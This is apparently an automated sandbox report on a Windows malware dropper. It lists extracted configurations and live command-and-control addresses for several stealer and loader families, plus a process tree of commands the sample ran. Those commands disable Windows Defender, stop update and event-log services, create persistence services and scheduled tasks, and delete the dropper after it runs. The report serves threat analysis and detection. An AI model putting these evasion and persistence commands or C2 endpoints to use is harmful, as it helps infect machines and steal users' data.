Analysis

  • max time kernel
    70s
  • max time network
    163s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    26-05-2024 03:15

General

  • Target

    a05345ccd64fb031822362759804dc5da0418d4308dcc9fe15c38e67ff8b5146.exe

  • Size

    1.8MB

  • MD5

    cf8ba95beca2f0cc6f6c487f5cc1a694

  • SHA1

    2b710076e751df471fe1a745a9cc95dbda059121

  • SHA256

    a05345ccd64fb031822362759804dc5da0418d4308dcc9fe15c38e67ff8b5146

  • SHA512

    0a1a61b08912083aeb54b3ee7950acb7e76e1a1208b187b52589bb0c56203682986f3b35657e8218d9f5e76ab2f855cee6e353b790d086046455a1b336faf770

  • SSDEEP

    49152:AMYggb6Tkh+jcXsWJxu5JFNmnzcQ1r8TDKQPtZ:AMgWAhwcXu5O51dG

Malware Config

Extracted

Family

amadey

Version

4.21

Botnet

0e6740

C2

http://147.45.47.155

Attributes
  • install_dir

    9217037dc9

  • install_file

    explortu.exe

  • strings_key

    8e894a8a4a3d0da8924003a561cfb244

  • url_paths

    /ku4Nor9/index.php

rc4.plain

Extracted

Family

amadey

Version

4.21

Botnet

49e482

C2

http://147.45.47.70

Attributes
  • install_dir

    1b29d73536

  • install_file

    axplont.exe

  • strings_key

    4d31dd1a190d9879c21fac6d87dc0043

  • url_paths

    /tr8nomy/index.php

rc4.plain

Extracted

Family

risepro

C2

147.45.47.126:58709

Extracted

Family

stealc

Botnet

zzvv

C2

http://23.88.106.134

Attributes
  • url_path

    /c73eed764cc59dcb.php

Extracted

Family

redline

Botnet

1

C2

185.215.113.67:40960

Extracted

Family

smokeloader

Version

2022

C2

http://trad-einmyus.com/index.php

http://tradein-myus.com/index.php

http://trade-inmyus.com/index.php

http://dbfhns.in/tmp/index.php

http://guteyr.cc/tmp/index.php

http://greendag.ru/tmp/index.php

http://lobulraualov.in.net/tmp/index.php

rc4.i32
rc4.i32
rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

@LOGSCLOUDYT_BOT

C2

185.172.128.33:8970

Extracted

Family

lumma

C2

https://roomabolishsnifftwk.shop/api

https://museumtespaceorsp.shop/api

https://buttockdecarderwiso.shop/api

https://averageaattractiionsl.shop/api

https://civilianurinedtsraov.shop/api

https://femininiespywageg.shop/api

https://employhabragaomlsp.shop/api

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Lumma Stealer

    An infostealer written in C++ first seen in August 2022.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 4 IoCs
  • RisePro

    RisePro stealer is an infostealer distributed by PrivateLoader.

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Stealc

    Stealc is an infostealer written in C++.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 6 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file
  • Stops running service(s) 4 TTPs
  • Checks BIOS information in registry 2 TTPs 12 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 5 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 13 IoCs
  • Identifies Wine through registry keys 2 TTPs 6 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 31 IoCs
  • Themida packer 4 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Looks up external IP address via web service 4 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Windows directory 2 IoCs
  • Launches sc.exe 14 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates processes with tasklist 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 12 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\a05345ccd64fb031822362759804dc5da0418d4308dcc9fe15c38e67ff8b5146.exe
    "C:\Users\Admin\AppData\Local\Temp\a05345ccd64fb031822362759804dc5da0418d4308dcc9fe15c38e67ff8b5146.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks computer location settings
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:1308
    • C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
      "C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Checks computer location settings
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:748
      • C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
        "C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe"
        3⤵
          PID:2068
        • C:\Users\Admin\1000004002\884043a532.exe
          "C:\Users\Admin\1000004002\884043a532.exe"
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Checks computer location settings
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:4012
          • C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
            "C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe"
            4⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Checks computer location settings
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:3952
            • C:\Users\Admin\AppData\Local\Temp\1000002001\buildjudit.exe
              "C:\Users\Admin\AppData\Local\Temp\1000002001\buildjudit.exe"
              5⤵
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:2188
              • C:\Users\Admin\AppData\Local\Temp\onefile_2188_133611669812423982\stub.exe
                "C:\Users\Admin\AppData\Local\Temp\1000002001\buildjudit.exe"
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of WriteProcessMemory
                PID:2724
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "ver"
                  7⤵
                    PID:456
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                    7⤵
                      PID:952
                      • C:\Windows\System32\Wbem\WMIC.exe
                        wmic csproduct get uuid
                        8⤵
                          PID:4424
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "tasklist"
                        7⤵
                          PID:3016
                          • C:\Windows\system32\tasklist.exe
                            tasklist
                            8⤵
                            • Enumerates processes with tasklist
                            PID:2900
                    • C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe
                      "C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe"
                      5⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      • Suspicious use of WriteProcessMemory
                      PID:996
                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                        6⤵
                          PID:4444
                          • C:\Users\Admin\AppData\Roaming\configurationValue\One.exe
                            "C:\Users\Admin\AppData\Roaming\configurationValue\One.exe"
                            7⤵
                              PID:5896
                            • C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe
                              "C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe"
                              7⤵
                                PID:5928
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"
                                7⤵
                                  PID:5072
                                  • C:\Windows\SysWOW64\choice.exe
                                    choice /C Y /N /D Y /T 3
                                    8⤵
                                      PID:728
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 996 -s 284
                                  6⤵
                                  • Program crash
                                  PID:2884
                              • C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe
                                "C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe"
                                5⤵
                                • Executes dropped EXE
                                PID:3736
                              • C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe
                                "C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe"
                                5⤵
                                • Executes dropped EXE
                                • Suspicious use of SetThreadContext
                                • Suspicious use of WriteProcessMemory
                                PID:3396
                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                  6⤵
                                    PID:4004
                                • C:\Users\Admin\AppData\Local\Temp\1000007001\Newoff.exe
                                  "C:\Users\Admin\AppData\Local\Temp\1000007001\Newoff.exe"
                                  5⤵
                                  • Checks computer location settings
                                  • Executes dropped EXE
                                  • Suspicious use of WriteProcessMemory
                                  PID:4300
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Newoff.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000007001\Newoff.exe" /F
                                    6⤵
                                    • Creates scheduled task(s)
                                    PID:800
                                  • C:\Users\Admin\AppData\Local\Temp\1000284001\toolspub1.exe
                                    "C:\Users\Admin\AppData\Local\Temp\1000284001\toolspub1.exe"
                                    6⤵
                                      PID:1260
                                    • C:\Users\Admin\AppData\Local\Temp\1000285001\FirstZ.exe
                                      "C:\Users\Admin\AppData\Local\Temp\1000285001\FirstZ.exe"
                                      6⤵
                                        PID:5700
                                        • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                          C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                          7⤵
                                          • Command and Scripting Interpreter: PowerShell
                                          PID:5184
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                          7⤵
                                            PID:6028
                                            • C:\Windows\system32\wusa.exe
                                              wusa /uninstall /kb:890830 /quiet /norestart
                                              8⤵
                                                PID:6456
                                            • C:\Windows\system32\sc.exe
                                              C:\Windows\system32\sc.exe stop UsoSvc
                                              7⤵
                                              • Launches sc.exe
                                              PID:3480
                                            • C:\Windows\system32\sc.exe
                                              C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                              7⤵
                                              • Launches sc.exe
                                              PID:6532
                                            • C:\Windows\system32\sc.exe
                                              C:\Windows\system32\sc.exe stop wuauserv
                                              7⤵
                                              • Launches sc.exe
                                              PID:6424
                                            • C:\Windows\system32\sc.exe
                                              C:\Windows\system32\sc.exe stop bits
                                              7⤵
                                              • Launches sc.exe
                                              PID:3964
                                            • C:\Windows\system32\sc.exe
                                              C:\Windows\system32\sc.exe stop dosvc
                                              7⤵
                                              • Launches sc.exe
                                              PID:4592
                                            • C:\Windows\system32\powercfg.exe
                                              C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                              7⤵
                                                PID:4940
                                              • C:\Windows\system32\powercfg.exe
                                                C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                7⤵
                                                  PID:1660
                                                • C:\Windows\system32\powercfg.exe
                                                  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                  7⤵
                                                    PID:4356
                                                  • C:\Windows\system32\powercfg.exe
                                                    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                    7⤵
                                                      PID:2164
                                                    • C:\Windows\system32\sc.exe
                                                      C:\Windows\system32\sc.exe delete "WSNKISKT"
                                                      7⤵
                                                      • Launches sc.exe
                                                      PID:1936
                                                    • C:\Windows\system32\sc.exe
                                                      C:\Windows\system32\sc.exe create "WSNKISKT" binpath= "C:\ProgramData\wikombernizc\reakuqnanrkn.exe" start= "auto"
                                                      7⤵
                                                      • Launches sc.exe
                                                      PID:7044
                                                    • C:\Windows\system32\sc.exe
                                                      C:\Windows\system32\sc.exe stop eventlog
                                                      7⤵
                                                      • Launches sc.exe
                                                      PID:6808
                                                    • C:\Windows\system32\sc.exe
                                                      C:\Windows\system32\sc.exe start "WSNKISKT"
                                                      7⤵
                                                      • Launches sc.exe
                                                      PID:6820
                                                • C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe"
                                                  5⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of SetThreadContext
                                                  • Suspicious use of WriteProcessMemory
                                                  PID:2784
                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                    6⤵
                                                      PID:4952
                                                  • C:\Users\Admin\AppData\Local\Temp\1000009001\swizzzz.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\1000009001\swizzzz.exe"
                                                    5⤵
                                                    • Executes dropped EXE
                                                    • Suspicious use of SetThreadContext
                                                    PID:2900
                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                      6⤵
                                                        PID:3312
                                                    • C:\Users\Admin\AppData\Local\Temp\1000010001\install.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\1000010001\install.exe"
                                                      5⤵
                                                        PID:5280
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installg.bat" "
                                                          6⤵
                                                            PID:5488
                                                            • C:\Windows\SysWOW64\sc.exe
                                                              Sc stop GameServerClient
                                                              7⤵
                                                              • Launches sc.exe
                                                              PID:5952
                                                            • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                              GameService remove GameServerClient confirm
                                                              7⤵
                                                                PID:6136
                                                              • C:\Windows\SysWOW64\sc.exe
                                                                Sc delete GameSyncLink
                                                                7⤵
                                                                • Launches sc.exe
                                                                PID:3016
                                                              • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                                GameService remove GameSyncLink confirm
                                                                7⤵
                                                                  PID:5288
                                                                • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                                  GameService install GameSyncLink "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
                                                                  7⤵
                                                                    PID:4424
                                                                  • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                                    GameService start GameSyncLink
                                                                    7⤵
                                                                      PID:5320
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installc.bat" "
                                                                    6⤵
                                                                      PID:5252
                                                                      • C:\Windows\SysWOW64\sc.exe
                                                                        Sc stop GameServerClientC
                                                                        7⤵
                                                                        • Launches sc.exe
                                                                        PID:3872
                                                                      • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                                        GameService remove GameServerClientC confirm
                                                                        7⤵
                                                                          PID:4372
                                                                        • C:\Windows\SysWOW64\sc.exe
                                                                          Sc delete PiercingNetLink
                                                                          7⤵
                                                                          • Launches sc.exe
                                                                          PID:3340
                                                                        • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                                          GameService remove PiercingNetLink confirm
                                                                          7⤵
                                                                            PID:5308
                                                                          • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                                            GameService install PiercingNetLink "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
                                                                            7⤵
                                                                              PID:3416
                                                                            • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                                              GameService start PiercingNetLink
                                                                              7⤵
                                                                                PID:5796
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installm.bat" "
                                                                              6⤵
                                                                                PID:8
                                                                                • C:\Windows\SysWOW64\sc.exe
                                                                                  Sc delete GameSyncLinks
                                                                                  7⤵
                                                                                  • Launches sc.exe
                                                                                  PID:5824
                                                                                • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                                                  GameService remove GameSyncLinks confirm
                                                                                  7⤵
                                                                                    PID:540
                                                                                  • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                                                    GameService install GameSyncLinks "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
                                                                                    7⤵
                                                                                      PID:6016
                                                                                    • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                                                      GameService start GameSyncLinks
                                                                                      7⤵
                                                                                        PID:5676
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "
                                                                                      6⤵
                                                                                        PID:5672
                                                                                    • C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe"
                                                                                      5⤵
                                                                                        PID:5816
                                                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
                                                                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
                                                                                          6⤵
                                                                                            PID:6080
                                                                                            • C:\Users\Admin\Pictures\6CGNgbVIJyP9KPqHNFUvsyns.exe
                                                                                              "C:\Users\Admin\Pictures\6CGNgbVIJyP9KPqHNFUvsyns.exe" /s
                                                                                              7⤵
                                                                                                PID:5456
                                                                                              • C:\Users\Admin\Pictures\VnEKrQsy1FOaxfS3hOc9QNdP.exe
                                                                                                "C:\Users\Admin\Pictures\VnEKrQsy1FOaxfS3hOc9QNdP.exe"
                                                                                                7⤵
                                                                                                  PID:5824
                                                                                                • C:\Users\Admin\Pictures\cpDDeLIc93QheyK4uZqPSOgw.exe
                                                                                                  "C:\Users\Admin\Pictures\cpDDeLIc93QheyK4uZqPSOgw.exe"
                                                                                                  7⤵
                                                                                                    PID:2040
                                                                                                  • C:\Users\Admin\Pictures\wdAYzRIhQlBKqWoGjeXqgLoy.exe
                                                                                                    "C:\Users\Admin\Pictures\wdAYzRIhQlBKqWoGjeXqgLoy.exe"
                                                                                                    7⤵
                                                                                                      PID:2724
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS7A18.tmp\Install.exe
                                                                                                        .\Install.exe /odidum "385118" /S
                                                                                                        8⤵
                                                                                                          PID:5028
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                            9⤵
                                                                                                              PID:5924
                                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                                10⤵
                                                                                                                  PID:4396
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                    11⤵
                                                                                                                      PID:5484
                                                                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                        12⤵
                                                                                                                          PID:3868
                                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                      forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                                      10⤵
                                                                                                                        PID:5696
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                          11⤵
                                                                                                                            PID:4912
                                                                                                                            • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                              12⤵
                                                                                                                                PID:3868
                                                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                            forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                                            10⤵
                                                                                                                              PID:4100
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                11⤵
                                                                                                                                  PID:3568
                                                                                                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                    12⤵
                                                                                                                                      PID:6388
                                                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                  forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                                                  10⤵
                                                                                                                                    PID:6556
                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                      11⤵
                                                                                                                                        PID:6624
                                                                                                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                          12⤵
                                                                                                                                            PID:6724
                                                                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                        10⤵
                                                                                                                                          PID:6848
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                            11⤵
                                                                                                                                              PID:6920
                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                12⤵
                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                PID:7036
                                                                                                                                                • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                                                                  "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                  13⤵
                                                                                                                                                    PID:6748
                                                                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                            "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                                                                                                                                            9⤵
                                                                                                                                              PID:2848
                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                                                                                10⤵
                                                                                                                                                  PID:2216
                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                                                                                    11⤵
                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                    PID:5280
                                                                                                                                                    • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                      "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                                                                                      12⤵
                                                                                                                                                        PID:6780
                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                  schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 03:18:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS7A18.tmp\Install.exe\" it /xLHdidspry 385118 /S" /V1 /F
                                                                                                                                                  9⤵
                                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                                  PID:3404
                                                                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                  "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"
                                                                                                                                                  9⤵
                                                                                                                                                    PID:6328
                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
                                                                                                                                                      10⤵
                                                                                                                                                        PID:6432
                                                                                                                                                        • \??\c:\windows\SysWOW64\schtasks.exe
                                                                                                                                                          schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
                                                                                                                                                          11⤵
                                                                                                                                                            PID:6492
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\1000022001\4.exe
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\1000022001\4.exe"
                                                                                                                                                5⤵
                                                                                                                                                  PID:5220
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\1000005001\812e0c93c3.exe
                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\1000005001\812e0c93c3.exe"
                                                                                                                                              3⤵
                                                                                                                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              • Identifies Wine through registry keys
                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                              PID:556
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
                                                                                                                                          1⤵
                                                                                                                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                          • Checks BIOS information in registry
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          • Identifies Wine through registry keys
                                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                          PID:3584
                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4388 --field-trial-handle=2252,i,16022092570067181109,3235558581947505669,262144 --variations-seed-version /prefetch:8
